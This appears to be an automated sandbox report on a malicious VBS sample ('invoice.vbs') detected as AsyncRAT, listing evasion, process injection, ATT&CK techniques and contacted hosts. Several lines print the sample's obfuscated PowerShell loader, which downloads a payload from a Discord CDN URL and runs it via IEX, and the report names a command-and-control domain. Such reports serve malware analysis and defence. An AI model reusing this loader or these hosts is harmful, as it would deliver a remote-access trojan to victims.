Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5556	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4800	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4800	Thread sleep time: -160000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.282588550.0000019FCE060000.00000002.00000001.sdmp, aspnet_compiler.exe, 0000000B.00000002.732929409.0000000005D90000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: aspnet_compiler.exe, 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vmware
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.282168154.0000019FCDD54000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.282588550.0000019FCE060000.00000002.00000001.sdmp, aspnet_compiler.exe, 0000000B.00000002.732929409.0000000005D90000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000003.00000002.282588550.0000019FCE060000.00000002.00000001.sdmp, aspnet_compiler.exe, 0000000B.00000002.732929409.0000000005D90000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: aspnet_compiler.exe, 0000000B.00000002.728153165.0000000001684000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000003.00000002.282588550.0000019FCE060000.00000002.00000001.sdmp, aspnet_compiler.exe, 0000000B.00000002.732929409.0000000005D90000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Show sources

Source: Yara match

File source: C:\Users\user\Documents\20210803\PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt, type: DROPPED

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 10BC008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');			Jump to behavior

Source: aspnet_compiler.exe, 0000000B.00000002.728432018.0000000001E60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: aspnet_compiler.exe, 0000000B.00000002.728432018.0000000001E60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: aspnet_compiler.exe, 0000000B.00000002.728432018.0000000001E60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: aspnet_compiler.exe, 0000000B.00000002.728432018.0000000001E60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Scheduled Task/Job1	Process Injection212	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting221	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Process Injection212	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting221	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information121	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing11	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.aspnet_compiler.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.discordapp.comx	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsof	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://csoft.com/pki/crls/MicRooCerAut_2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high
ahmed2611.linkpc.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ahmed2611.linkpc.net	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/833416270924742669/869658269294137374/dola2020.txt	powershell.exe, 00000003.00000002.276154584.0000019FB6AB4000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp, Run.vbs.3.dr	false		high
https://cdn.discordapp.comx	powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt	PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt.3.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	false		high
http://crl.microsof	powershell.exe, 00000003.00000002.282168154.0000019FCDD54000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000003.00000003.216141533.0000019FB73B7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://csoft.com/pki/crls/MicRooCerAut_2	powershell.exe, 00000003.00000002.264765066.0000019FB57BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.264881794.0000019FB58D1000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.130.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458958
Start date:	03.08.2021
Start time:	22:55:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	invoice.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@8/6@62/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 82% Number of executed functions: 36 Number of non-executed functions: 1
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 23.211.6.115, 20.82.209.183, 23.211.4.86, 173.222.108.226, 173.222.108.210, 40.112.88.60, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.54.110.249 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, 